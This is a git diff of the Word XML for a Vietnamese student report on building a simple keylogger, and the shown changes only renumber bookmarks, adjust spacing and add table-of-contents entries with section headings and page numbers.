--- a/Báo cáo Project 1 tạo Keylogger đơn giản.docx
+++ b/Báo cáo Project 1 tạo Keylogger đơn giản.docx
@@ -1292,7 +1292,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_Toc43674101"/>
-      <w:bookmarkStart w:id="1" w:name="_Toc56805878"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc57761752"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1446,7 +1446,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="2" w:name="_Toc43674102"/>
-      <w:bookmarkStart w:id="3" w:name="_Toc56805879"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc57761753"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1501,7 +1501,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
             </w:tabs>
-            <w:spacing w:before="120" w:after="0"/>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
@@ -1533,7 +1532,7 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc56805878" w:history="1">
+          <w:hyperlink w:anchor="_Toc57761752" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1574,7 +1573,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc56805878 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761752 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1623,7 +1622,6 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
             </w:tabs>
-            <w:spacing w:before="120" w:after="0"/>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
@@ -1631,7 +1629,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc56805879" w:history="1">
+          <w:hyperlink w:anchor="_Toc57761753" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1672,7 +1670,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc56805879 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761753 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1721,7 +1719,105 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
             </w:tabs>
-            <w:spacing w:before="120" w:after="0"/>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761754" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>DANH MỤC HÌNH ẢNH</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761754 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>4</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p/>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
@@ -1729,7 +1825,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc56805880" w:history="1">
+          <w:hyperlink w:anchor="_Toc57761755" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1770,7 +1866,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc56805880 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761755 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1799,7 +1895,2537 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761756" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>1. Lý do chọn đề tài</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761756 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761757" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>2. Tổng quan về đề tài</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761757 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>5</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761758" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>3. Mục đích nghiên cứu</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761758 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761759" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>4. Phạm vi nghiên cứu</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761759 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761760" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>5. Đóng góp của đề tài</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761760 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761761" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>6. Kết cấu bài báo cáo</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761761 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p/>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc57761762" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>CHƯƠNG I: TỔNG QUAN VỀ ĐỀ TÀI KEYLOGGER</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc57761762 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
